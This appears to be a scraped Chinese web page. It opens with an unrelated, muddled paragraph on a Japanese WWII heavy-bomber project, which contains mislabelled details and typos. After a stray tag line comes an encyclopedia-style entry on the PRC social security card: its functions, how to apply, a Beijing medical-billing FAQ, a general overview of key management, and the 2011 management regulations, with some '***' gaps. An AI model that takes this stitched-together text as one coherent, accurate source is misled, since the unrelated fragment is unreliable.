1941年，日本海军推出了实验性的13式攻击轰炸机，一种四引擎远程重型轰炸机，但是参谋本部想要更大、更重、更快的运载工具，能够在32800英尺的高度飞行，装载22000磅的炸弹。为此，日本陆军开始着手研制此类飞机，包括中岛G10N和川崎Ki-91相继被退出，前者有237英尺的翼展和144英尺的总长度，它将能够以590公里/小时的速度在25000英尺的高度上飞行，装备有六台5000马力的发动机，不过由于战争条件恶化，Z项目于1944年7月被取消。

日本(95)日本人(6)气球(1)

D. 中华人民共和国社会保障卡详细资料大全

中华人民共和国社会保障卡是由人力资源和社会保障部统一规划，由各地人力资源和社会保障部门面向社会发行，用于人力资源和社会保障各项业务领域的积体电路（IC）卡。

社会保障卡作用十分广泛。持卡人不仅可以凭卡就医进行医疗保险个人账户实时结算，还可以办理养老保险事务；办理求职登记和失业登记手续；申领失业保险金；申请参加就业培训；申请劳动能力鉴定和申领享受工伤保险待遇；在网上办理有关劳动和社会保障事务等。

社会保障卡采用全国统一标准，社会保障号码按照《社会保险法》的有关规定，采用公民身份号码。

截至2018年6月底，全国社会保障卡持卡人数达到11.5亿人。

基本介绍

• 中文名 ：中华人民共和国社会保障卡
• 外文名 ：People's Republic of China social security card
• 简称 ：中国社保卡
• 作用 ：用于社会保障服务

类型,功能,作用,办理条件,开展情况,现状,范围,问题解答,安全设计,管理办法,第一章 总 则,第一条,第二条,第三条,第四条,第二章 发行管理,第一条,第二条,第三条,第四条,第三章 制作管理,第一条,第二条,第三条,第四条,第五条,第四章 套用管理,第一条,第二条,第三条,第四条,第五条,第六条,第五章 安全管理,第一条,第二条,第三条,第四条,第五条,第六条,第七条,第六章 产品管理,第一条,第二条,第三条,第四条,第五条,第七章 附则,第一条,第二条,第三条,

类型

社会保障卡从持卡人类型来看，可以分为两类，即：面向城镇从业人员、失业人员和离退休人员发放的称为社会保障（个人）卡，面向用人单位发放的称为社会保障（用人单位）卡。我国劳动保障部有关卡规划和规范的重点为社会保障（个人）卡，各地区实际发放的也多集中于个人卡，所以我们所说的社会保障卡，就是指社会保障（个人）卡。

功能

社会保障卡卡面和卡内均记载持卡人姓名、性别、公民身份号码等基本信息，卡内标识了持卡人的个人状态（就业、失业、退休等），可以记录持卡人社会保险缴费情况、养老保险个人账户信息、医疗保险个人账户信息、职业资格和技能、就业经历、工伤及职业病伤残程度等。社会保障卡是劳动者在劳动保障领域办事的电子凭证。持卡人可以凭卡就医，进行医疗保险个人账户结算；可以凭卡办理养老保险事务；可以凭卡到相关部门办理求职登记和失业登记手续，申领失业保险金，申请参加就业培训；可以凭卡申请劳动能力鉴定和申领享受工伤保险待遇等。此外，社会保障卡还是握在劳动者手中开启与系统联络之门的钥匙，凭借这把钥匙，持卡人可以上网查询信息，将来还可以在网上办理有关劳动和社会保障事务。 中华人民共和国人力资源和社会保障部正在推行社保一卡通，部署扩展社会保障卡套用领域的工作。为此，该部发布了《关于社会保障卡载入金融功能的通知》。载入金融功能后的社会保障卡在具有信息记录、信息查询、业务办理等功能的同时，还可作为银行卡使用，具有现金存取、转账、消费等金融功能。以便促进金融服务民生，方便民众享受社保待遇和金融服务。 具有金融功能的社会保障卡的金融套用为人民币借记套用，暂不支持贷记功能。该卡卡片介质一般为接触式晶片卡，但也有银行发行介质为接触+非接触的双界面卡的社会保障卡，社保卡用晶片加隐蔽磁条复合卡的形式暂时过渡，晶片中应同时包含人力资源社会保障套用和金融套用。社会保障卡采用全国统一标淮，社会保障号码按照《社会保险法》的有关规定，采用公民身份号码。从此，社保卡将加入金融功能，全国统一。 例如，北京市居民健康卡、京医通卡及北京通卡将实现“三卡合一”。此前，大多数北京市民在就医过程中都曾遇到过这样的问题，光拿上社保卡却发现有时挂号、结算医院并不认，还需要再额外办理各家医院的就诊卡。 与此同时，本市推行了超过5年的居民健康卡、在北京市属医院范围内全覆盖的京医通卡以及主要面向本市新农合参合农民发放的北京通卡三种卡片在功能上也存在交叉和重叠。 融合后的新北京通卡分为北京通社保卡、北京通基本卡和北京通临时卡三类。北京通社保卡和北京通基本卡的发放对象为在京缴纳社保的常住居民（含北京户籍人口和非北京户籍人口），北京通临时卡发放对象则为临时来京人员。届时，北京通社保卡将包括社保套用、“北京通”套用、健康套用、金融套用、交通套用；北京通基本卡包括“北京通”套用、健康套用、金融套用、交通套用。最终这张“北京通”将成为一张多功能社会服务卡。 北京市医管局也会做好技术衔接，同时各医疗机构也会逐步完成院内读卡机的升级改造。到2017年年底，预计面向本市270万新农合参合农民的发卡率将达到85%。在北京通卡发放后，包括各大医院的就诊卡和京医通卡等将会逐步退出。

作用

1.个人社会保障相关信息记录、电子凭证和信息查询等; 2.记录参保人员姓名、身份证号码、出生年月、性别、民族、户籍所在地等基本信息; 3.查询本人养老、失业、医疗、工伤和生育保险缴纳情况; 4.可持卡到医院就医，进行医疗保险个人账户结算，到药店买药; 5.办理医疗、失业、养老、工伤和生育等社保事务; 6.查询养老保险、医疗保险累计总额等信息; 7.办理领取养老金等社保事务，进行求职、失业登记，申领失业保险金，申请参加职业培训等。 8.用于身份证明。

办理条件

符合申领条件的人员可以通过电话向申领网点预约或直接前往街道（镇）社会保障卡申领服务网点申请办理社会保障卡（包括学籍卡）。申领时需携带身份证、户口簿、申领表（集体户口市民需要携带户籍所在地警署或派出所开具的户籍证明）等相关资料。咨询电话12333。

开展情况

现状

自2011年9月起，多地社会保障卡载入金融功能，社保卡更换了金融晶片，新社保卡成为持卡人享有社会保障和公共就业服务权益的电子凭证，具有信息记录、信息查询、业务办理等社会保障卡基本功能的同时可作为银行卡使用，具有现金存取、转账、消费等金融功能。 截至2016年底，我国社会保障卡持卡人数达9.72亿人，2017年，社保卡还将基本实现全国一卡通。 截至2018年6月底，全国社会保障卡持卡人数达到11.5亿人。

范围

金融社保卡在全国范围内铺开，包括广东、湖北、内蒙、黑龙江、山西、山东、宁夏、河北、贵州、新疆、重庆等地都开始发行金融社保卡。

问题解答

问：在使用社保卡之前，已发生门诊医疗费用，如何报销？ 答：使用社保卡之前，已发生的门诊医疗费用，交到单位或社保所按原流程报销，如果您已使用过社保卡就医，需同时将社保卡上交。 社会保障卡 问：门诊挂号诊疗费用不按比例报销了？ 答：自2009年6月1日起，门诊诊疗费由医疗保险基金定额支付2元，其余费用由参保人员现金交纳。值得说明的是，无论患者发生的医疗费用是否超过门诊起付线，医疗保险基金同样定额支付2元。 问：外购药品医疗费用是否持卡实时结算？ 答：因外购药品发生的医疗费用不进行持卡实时结算，仍按原结算方式操作。 问：参保人员什么特殊情况下发生的全额现金垫付医疗费用可进行报销？ 答：如遇有急诊未持社会保障卡、计画生育手术、企业欠费、手工报销或补换社保卡期间、参保后未发社会保障卡等情况就医的，仍由参保人员个人现金全额垫付医疗费用，不能在医院直接完成实时结算，符合医疗保险基金支付条件的，要按照原流程办理手工报销手续。 问：如何读懂实时结算收费票据？ 答：实时结算收费票据明细中，医疗保险范围内金额能够纳入医疗保险支付范围的费用总额。 本次医疗保险基金支付：按照政策规定应由医疗保险基金支付的费用总额，包括门诊大额医疗，退休人员补充保险，残疾军人补助。 “本次个人负担”的医疗费用包括三部分内容： 1、自付一：按比例个人应负担的医疗费用（包括起付线和超封顶线以上金额）； 2、自付二：乙类目录中需要个人负担的金额（如乙类药品中个人自付的10%的医疗费用）； 3、自费：报销范围（即药品、诊疗、服务设施三个目录）以外的医疗费用； 当次就医医疗费用总额=本次医疗保险基金支付+本次个人负担。 问：在职转退休人员应如何进行社保卡信息变更？ 答：持卡人信息，可到发卡单位所在区县的社保经办机构进行数据同步。 问：在职转退休人员没有及时变更社保卡信息会出现哪些问题？ 答：在职职工退休后没有及时变更信息，在持卡就医时，仍将按照在职职工的门诊起付线和报销比例进行报销，这可能会损害参保人员的医保权益。 问：持卡就医是否需要选定医院？ 答：实行持卡就医后，个人就医的定点医疗机构仍以医保手册选定的定点医疗机构为准，A类、中医、专科医院可以直接就医。 问：参保人员持社保卡就医，起付线有变化吗？ 答：持卡就医后起付线标准不变：参保人员门（急）诊费用一个年度内只扣一个起付线：超过起付线的部分，按照政策规定的报销比例，个人只负担应自付部分的医疗费用。 问：持卡就医后，个人帐户管理的政策有何调整？ 答：个人帐户管理的政策没有调整。持卡就医后参保人员的个人帐户金额仍按月划入参保人在北京银行的医保专用存折中，个人帐户资金仍可在银行自主支取。 问：已领取社保卡的参保人不慎将医保手册（蓝本）丢失，如何处理？如社保卡丢失，如何补办？ 答：需通过单位到参保地的区县社保中心办理补领医保手册（蓝本）手续，在补办医保手册（蓝本）时，单位需提供持卡人的社保卡，区县社保中心将为其同步更新社保卡的卡内信息。 社保卡丢失需通过单位到参保地的区县社保中心办理补领卡手续，单位需同时提供参保人员的医保手册（蓝本），区县社保中心将为其同步更新社保卡的卡内信息。 问：社会保障卡到哪里领取？ 答：在职人员在参保单位领卡；退休人员在原参保单位领卡；社会化管理退休人员在参保街道社保所领取；职介、人才存档人员在参保区职介、人才服务中心领卡。 问：领到卡后，发现卡内信息有误怎么改？ 答：发现此种情况，多为照片与本人不符，或姓名音同字不同等。凡属上述情况，持卡人应通过单位将社保卡交回区社保中心。 问：领到的社保卡与本人身份证信息不一致怎么办？ 答：将社保卡与身份证或户口簿复印件交给单位，由其上交区县社保中心重新制卡。 问：如何查询卡内信息？ 答：可持卡到卡服务网点由工作人员帮助查询，或持卡在自助终端机电子触控萤幕上自助查询。 本市社保卡服务体系主要由社保卡服务网点、社保卡服务热线、社保卡服务网站和社保卡自助服务终端四部分组成。社保卡服务网点设定在全市300多个街道社会保障事务所和18个区县社保中心及市经济开发区社保中心，方便持卡人办理社保卡相关业务；社保卡服务热线是“96102”，提供24小时开通服务；另外通过登录北京市人力资源和社会保障网，可进入社保卡服务网站界面。社保卡服务网点和本市二级以上的定点医疗机构内均安装了社保卡服务自助终端机，可实现查询医保信息以及预挂失等功能。 问：为什么单位中有的职工有卡，有的没有？ 答：本次发放的社会保障卡为2009年2月16日零时医疗保险资料库中的时点信息，此后新参保的人员及因信息比对有误需进行二次信息采集的人员不在本次发卡范围。因此，造成单位中有的职工有卡，有的没有。 问：参保人领卡后，对持卡就医的时间如何确定？为什么一些单位告知参保人在下半年或年度才能使用社保卡就医结算？ 答：参保人员在领到社保卡后，即可到定点医疗机构持卡就医、实时结算。但在此之前如有个人全额垫付的医疗费用，应提前办理手工报销手续。 问：已领取社保卡的参保人员，其手中的医保手册（蓝本）是否继续使用？ 答：本市的社保卡将分期分批发放，在社保卡完全替代医保手册（蓝本）之前，社保卡与医保手册（蓝本）并行使用。医保手册（蓝本）停止使用时，将向全市发布通知予以告知。 问：本次看病忘了带卡怎么办？ 答：领到社保卡的参保人员在已开通持卡就医结算服务的定点医疗机构就医，须出示社保卡。未出示社保卡的，所发生费用由个人全额负担，医保基金不能支付。 问：初次使用社保卡的参保人员如何办理开卡的手续？ 答：参保人员持社保卡到定点医疗机构就医，在办理挂号或交费的同时，社保卡即可开通。 问：持社会保障卡怎样看病？ 答：首先，在挂号时必须出示社会保障卡，现金交纳个人自付、自费费用，医院为参保人员出具收费票据；其次，到诊室看病时，要向医生主动出示社会保障卡和“北京地区医疗机构门急诊病历手册”；第三，交费时，须将社会保障卡和交费单据一起交给结算人员，缴纳个人自付、自费部分费用；最后拿到结算单据后，认真核对单据上的各项内容，收回社保卡。 问：退休人员统一补充医疗保险是否同时刷卡结算？ 答：是。 问：补（换）社会保障卡期间如何看病？ 答：参保人员在申请补（换）社会保障卡期间，到定点医疗机构就医时，需要主动出示《新发与补（换）社会保障卡证明》。定点医疗机构根据《新发与补（换）社会保障卡证明》采集有关的信息，并上传费用明细。定点医疗机构为参保人员结算医疗费用时，全额收取现金，出具相关单据，参保人员持新的社会保障卡按原流程进行医疗费用申报。 问：持卡人员到不具备刷卡条件的定点医疗机构如何就医？ 答：持卡人员到不具备刷卡条件的定点医疗机构就医，先现金全额交费，由医院为参保人员出具医疗费用单据，并上传医疗费用明细，参保人员持社会保障卡按原流程进行门诊医疗费用报销。 问：发生工伤事故后就医，如何区分是否应当用社保卡实时结算？如实时结算了，后又被认定工伤，如何解决？ 答：如果认定确实是工伤事故，应全额垫付医疗费用，后经由工伤保险报销；如实时结算，后又被认定工伤，参保人员将实时结算的费用办理退费，再全额垫付医疗费用，事后将全额垫付的医疗费用申报至区县医疗保险经办机构进行手工报销。 问：哪些情形需进行社保卡信息变更？ 答：(1)医疗保险在职转退休；(2)残疾军人新参保；(3)转换医疗保险险种；(4)特殊病种审批；(5)手册丢失补领手册。

安全设计

卡系统软体包括密钥管理系统、发卡管理系统、卡管理维护系统、交易管理接口、卡内查询系统、帐务管理、数据网路传输、清算管理、HIS(医疗信息管理系统)、异常交易处理功能等等。 社保卡的硬体体系结构主要包括：服务器、工作终端、初始化设备、读卡设备、加密机等等。 该卡要求采用密码算法，采用晶片技术合作，有很严格的密钥管理体系和审批程式，造假可能性极低。 李东荣表示，就掌握的情况看，造假的可能性是极低的，这个卡要求是采用密码算法，采用晶片技术合作，有很严格的密钥管理体系和审批程式。李东荣还说，社保卡的金融套用不支持贷记功能，使用范围也是在境内。 社保卡是国家赋予个人社会保障权益的一种载体，请大家保护好自己的权益，特别是载入金融功能后，把卡借给别人就等于把自己的银行卡借给别人，对自己的权益是一个损失，也给犯罪分子提供了犯罪的土壤。

管理办法

关于印发“中华人民共和国社会保障卡”管理办法的通知（人社部发〔2011〕47号） 人力资源社会保障部副部长胡晓义 各省、自治区、直辖市人力资源社会保障厅（局），福建省公务员局，新疆生产建设兵团人事局、劳动保障局： 为推动“中华人民共和国社会保障卡”（以下简称社会保障卡）的发行和套用，规范社会保障卡管理，促进社会保障卡建设稳妥、有序、健康地开展，现将《“中华人民共和国社会保障卡”管理办法》印发你们，请遵照执行。 本办法主要对各级人力资源社会保障部门管理社会保障卡的各个环节进行规范。对于社会保障卡封装、运输、使用及持卡人权益等涉及人力资源社会保障系统外部环节的管理要求，我部将另行规定。 中华人民共和国人力资源和社会保障部 二〇一一年四月二十日

第一章 总 则

第一条

为规范“中华人民共和国社会保障卡”（以下简称社会保障卡）发行、套用和管理，维护持卡人的合法权益，提高人力资源社会保障管理服务水平，制定本办法。

第二条

本办法所称社会保障卡，是指面向社会公众发行，主要套用于人力资源社会保障领域 *** 社会管理和公共服务的积体电路卡。 社会保障卡是持卡人享有社会保障和公共就业服务权益的电子凭证，具有信息记录、信息查询、业务办理等基本功能。

第三条

人力资源社会保障部负责管理全国社会保障卡发行和套用工作。省、地市级人力资源社会保障部门负责管理本地区社会保障卡发行和套用工作，其所属的信息化综合管理机构具体承担社会保障卡发行和技术管理的有关事务。

第四条

社会保障卡按照“一卡多用，全国通用”的原则进行建设。各地发行社会保障卡必须遵循安全性、完整性和公益性的要求，采用全国统一的标准规范，保证在全国范围内使用。

第二章 发行管理

第一条

省级人力资源社会保障部门或地市级人力资源社会保障部门经人力资源社会保障部批准后，可发行社会保障卡。其他任何机构和组织均不得发行社会保障卡。

第二条

发行社会保障卡的地区（以下简称发卡地区）应建立规范的人力资源社会保障业务流程，各项业务间具有较强的综合协调性，能够保证社会保障卡的有效套用。同时，还应具备以下技术条件： （一）建立为社会保障卡套用提供后台支持的业务管理系统、资料库和适于用卡方式的信息网路； （二）具备支持社会保障卡管理和套用的技术力量，包括人员、设备等，能够快速完成社会保障卡套用的系统布局； （三）制定规范可行的实施方案，包括套用设计方案、费用解决方案、信息采集方案和具体发行方案等； （四）建立科学完善的社会保障卡发行、管理制度和明确的内部控制程式，并制定应对突发事件的预案； （五）人力资源社会保障部规定的其他条件。

第三条

申请发行社会保障卡，需提交下列材料： （一）填写完备的社会保障卡发行注册申请表； （二）社会保障卡发行筹备情况说明； （三）符合全国统一规范要求的套用领域和卡内套用档案结构（包括本地扩充的套用领域和指标）； （四）按照统一要求设计的卡面样式； （五）本地区社会保障卡管理办法和实施细则； （六）人力资源社会保障部要求提供的其他材料。

第四条

社会保障卡的注册审批程式： （一）省级人力资源社会保障部门发行社会保障卡，需将申请发行材料报人力资源社会保障部信息化领导小组办公室审核。 （二）地市级人力资源社会保障部门发行社会保障卡，需将申请发行材料报省级人力资源社会保障部门进行初审。初审通过后，报人力资源社会保障部信息化领导小组办公室审核。 （三）人力资源社会保障部信息化领导小组办公室审核批准后，统一为被批准发行社会保障卡的地区分配社会保障卡发行机构标识号，并按国家有关规定向国家IC卡注册中心备案。 （四）发卡地区若变更社会保障卡卡面、卡内档案结构等须报人力资源社会保障部信息化领导小组办公室重新审批。若变更供卡厂商和产品、扩大发卡人群、增加拟发卡数量等，须报人力资源社会保障部信息化领导小组办公室备案。

第三章 制作管理

第一条

社会保障卡采用全国统一的卡面样式，正面印有“中华人民共和国社会保障卡”字样，背面印有持卡人姓名、社会保障号码、持卡人照片、发卡单位等信息。

第二条

社会保障卡卡内档案结构划分、控制密钥载入、卡面印刷、个性化信息写入等制作工作，由省级社会保障卡发行管理机构统一组织；省级不具备集中制作条件的，可交由发卡地市或第三方机构承办。

第三条

发卡地区选定的承办社会保障卡制作的第三方机构，应具备符合人力资源社会保障部要求的安全生产环境，在数据存放、传输、使用以及卡片运输过程中具有严格的安全管理措施，能够保证社会保障卡数据和密钥的安全。

第四条

初次制卡、更换供卡厂商和产品等情况下，均须通过正式制卡环境先行制作测试卡，通过人力资源社会保障部信息化领导小组办公室组织的标准符合性审核、安全性审核和跨地区通用性测试后，方可正式制作、发放。

第五条

发卡地区要按照方便持卡人的原则，制定科学、合理的发放流程，便捷地将社会保障卡发放到持卡人手中。

第四章 套用管理

第一条

各级人力资源社会保障部门应积极推动社会保障卡在各业务领域的套用。对于暂不具备用卡条件的业务，须做好预留。对于需要借助金融功能开展的业务，应通过在社会保障卡上搭载金融功能的方式实现。

第二条

各级人力资源社会保障部门应保障持卡人查询、办理人力资源社会保障业务的权利，采取技术手段和管理措施，保护持卡人的个人隐私，依法使用与社会保障卡有关的信息，确保社会保障卡的安全使用。

第三条

经批准发行社会保障卡的省级、地市级人力资源社会保障部门应制定明确的社会保障卡套用管理规程，并通过在服务场所明示、 *** 网站公示等方式向社会发布。社会保障卡套用管理规程应包括以下内容： （一）社会保障卡的功能、用途； （二）社会保障卡的发行对象、申领条件、申领手续； （三）社会保障卡的使用范围（包括使用方面的限制）、使用期限及使用方法； （四）社会保障卡损坏、遗失后的挂失、补发程式； （五）发卡机构、持卡人及其他有关当事人的权利、义务等。

第四条

人力资源社会保障部统一规划和部署社会保障卡的跨地区套用，实行跨地区套用接入制度。人力资源社会保障部信息化领导小组办公室具体负责对各地用卡环境的一致性和安全性检查，检查通过的予以接入。

第五条

社会保障卡应主要用于人力资源社会保障业务领域。在保持主要功能不变、标准规范不变、密钥体系不变、管理主体不变的前提下，经省级人力资源社会保障部门同意、人力资源社会保障部批准，可以搭载其他公共服务功能。

第六条

社会保障卡因损坏、遗失、到期等原因不再使用的，应列入失效名单。失效名单实行分级管理，人力资源社会保障部、省级、地市级人力资源社会保障部门分别管理全国、全省、全市范围内的社会保障卡失效名单，并提供查询服务。

第五章 安全管理

第一条

社会保障卡采用密钥安全技术，实行全国统一的密钥管理体系。

第二条

人力资源社会保障部负责生成和管理全国通读通写档案的控制密钥、及其他需要在全国范围内使用的密钥，并按照统一规则逐级分散给省、地市两级人力资源社会保障部门，形成子密钥。 省、地市两级人力资源社会保障部门负责生成和管理仅限本地区使用的密钥，以及本地区自行扩充档案的读写密钥；负责管理由人力资源社会保障部逐级分散给其的子密钥。

第三条

用于社会保障卡密钥管理和安全套用的加密机须具有国家密码管理部门颁发的商用密码产品型号证书，并符合人力资源社会保障部有关规范要求。

第四条

用于存储密钥的社会保障卡主控密钥卡、密钥母卡、传输密钥卡、安全访问控制模组（PSAM卡）等由人力资源社会保障部统一发放。

第五条

发卡地区须建立严格的社会保障卡密钥管理制度，严格规范密钥及加密机、主控密钥卡、密钥母卡、传输密钥卡等密钥载体的保管、使用程式；在确需将密钥载体移交给第三方使用时，须做好交接记录，签署保密协定，审核其安全管理方案，并对第三方的使用情况进行监督。

第六条

发卡地区须建立PSAM卡管理制度，详细记录其具体信息和使用情况，建立收回、销毁机制，并对其实际使用时的物理形式、外界条件、使用方式等进行明确规定，保证用卡环境安全。

第七条

各级人力资源社会保障部门应建立社会保障卡安全管理应急预案，妥善处理社会保障卡发放、使用、及密钥管理中出现的安全问题。凡出现密钥载体遗失等安全事故的地区，须立即报告上级人力资源社会保障部门和人力资源社会保障部，并查明原因，根据国家关于安全保密的有关规定做出处理。

第六章 产品管理

第一条

社会保障卡晶片实行备案制度。发卡地区拟选用的晶片，应报人力资源社会保障部信息化领导小组办公室备案后，才能在社会保障卡中采用。

第二条

发卡地区拟选用的晶片，应从具备以下条件的晶片厂商所提供的产品中选择： （一）国家信息产业主管部门认定的积体电路设计企业； （二）具有国家密码管理部门颁发的商用密码产品销售许可证和商用密码产品生产定点单位证书，至少有一款积体电路卡（IC卡）晶片产品通过国家相关部门组织的通用准则评估保证级别4+（EAL4+）的信息安全认证； （三）企业管理规范，通过ISO9001质量体系认证并取得相应证书。

第三条

社会保障卡的晶片应符合以下条件： （一）为硬掩膜工艺加工制造的智慧卡（CPU卡）晶片，存储器应由随机存储器（RAM）、唯读存储器（ROM）、电可擦可程式唯读存储器（EEPROM）组成，不包含其他类型的存储器； （二）支持国家密码管理部门认可的加密算法，具有国家密码管理部门颁发的商用密码产品型号证书； （三）提供晶片的厂商对该晶片具有自主智慧财产权。

第四条

发卡地区应选择具有自主开发能力的厂商提供的社会保障卡卡内作业系统（COS）和读写机具，其选定的上述产品均需符合人力资源社会保障部社会保障卡规范要求。

第五条

人力资源社会保障部组织省级人力资源社会保障部门对已投入使用的社会保障卡产品质量和标准符合性等进行检查、监督。

第七章 附则

第一条

社会保障卡的发行费用依据国家有关规定报批并收取。

第二条

社会保障卡相关技术规范、办事流程、制度要求、卡面样式等，由人力资源社会保障部信息化领导小组办公室依据本办法另行规定。

第三条

本办法由人力资源社会保障部信息化领导小组办公室负责解释。